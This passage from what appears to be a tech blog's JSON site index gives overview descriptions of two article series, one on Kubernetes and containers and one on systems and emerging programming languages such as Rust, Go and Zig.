security for containers.\nCost Optimization: Resource management, node rightsizing, cluster scaling, and optimizing Kubernetes costs.\nLearning Path # Master Kubernetes basics — understand pods, services, deployments, and core abstractions Learn production patterns — network policies, resource limits, logging, and monitoring Explore advanced architectures — multi-cluster, service mesh, and operator patterns Understand the ecosystem — observability tools, container runtimes, and supporting infrastructure Optimize for production — cost, security, and operational efficiency at scale Key Topics Covered # Core Kubernetes: Pods, services, deployments, statefulsets, and native resources Networking: CNI, network policies, ingress, load balancing, and service discovery Storage: Persistent volumes, storage classes, backup strategies, and stateful workloads Operators \u0026amp; CRDs: Custom resources, operator frameworks, and lifecycle management Service Mesh: Istio, Linkerd, Envoy, and observability/security benefits Observability: Prometheus, Grafana, Jaeger, distributed tracing, and cluster monitoring Security: RBAC, network policies, pod security policies, and secrets management Container Runtimes: containerd, CRI-O, and alternatives to Docker Related Series # Explore complementary areas: Cloud Operations (operating containerized infrastructure), Cloud Platform Watch (managed Kubernetes services from cloud providers)\n","externalUrl":null,"permalink":"/series/kubernetes--containers/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Kubernetes \u0026 Containers","type":"series"},{"content":" Overview # Systems programming is being revolutionized. Rust addresses C/C++\u0026rsquo;s memory safety issues without garbage collection, Go provides pragmatic simplicity for backend infrastructure, and emerging languages like Zig, Odin, and V challenge fundamental assumptions about language design. This series covers the evolution of systems languages, adoption stories in production, and what language design principles are shaping the next generation.\nSystems languages matter everywhere—in infrastructure, security, performance-critical applications, and embedded systems.\nWhat You\u0026rsquo;ll Find Here # Language Features \u0026amp; Design: Understanding what makes languages suitable for systems work—memory management, concurrency models, performance characteristics, and ergonomics.\nRust Adoption: How Rust is entering production systems, Linux kernel integration, challenges with ecosystem immaturity, and where Rust\u0026rsquo;s strengths shine.\nGo Growth: Why Go became the lingua franca for cloud infrastructure and backend services, standard library strengths, and concurrent programming patterns.\nEmerging Languages: New contenders like Zig, Odin, V, and Mojo—radical rethinking of language design and solving specific problem domains.\nLanguage Comparisons: Understanding trade-offs between memory safety, performance, expressiveness, and ecosystem maturity.\nAdoption Patterns: How organizations transition from C/C++ to Rust, when Go is the right choice, and evaluating new languages for critical infrastructure.\nLearning Path # Understand systems programming constraints — memory safety, concurrency, performance, and reliability requirements Learn Rust fundamentals — ownership, borrowing, and why memory safety without GC matters Explore Go pragmatism — simplicity, concurrency patterns, and why Go excels for infrastructure Track emerging languages — understand new design approaches and when they solve real problems Make strategic choices — evaluating languages for your use case and team capabilities Key Languages \u0026amp; Topics Covered # Rust: Memory safety, ownership system, async/await, WASM, and production adoption Go: Concurrency primitives, goroutines, simplicity philosophy, and systems integration Emerging Languages: Zig (manual memory management without C), Mojo (Python with systems performance), Odin, V Language Features: Type systems, memory models, concurrency models, and error handling Ecosystem: Standard libraries, package managers, tooling, and third-party libraries Performance: Benchmarks, profiling, and optimization techniques in each language Interoperability: FFI, C bindings, and integrating with existing systems Related Series # Explore complementary areas: Python Evolution (Python\u0026rsquo;s role while systems languages handle critical paths), Developer Tooling (language-specific tooling and IDE support)\n","externalUrl":null,"permalink":"/series/systems--emerging-languages/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Systems \u0026 Emerging Languages","type":"series"}]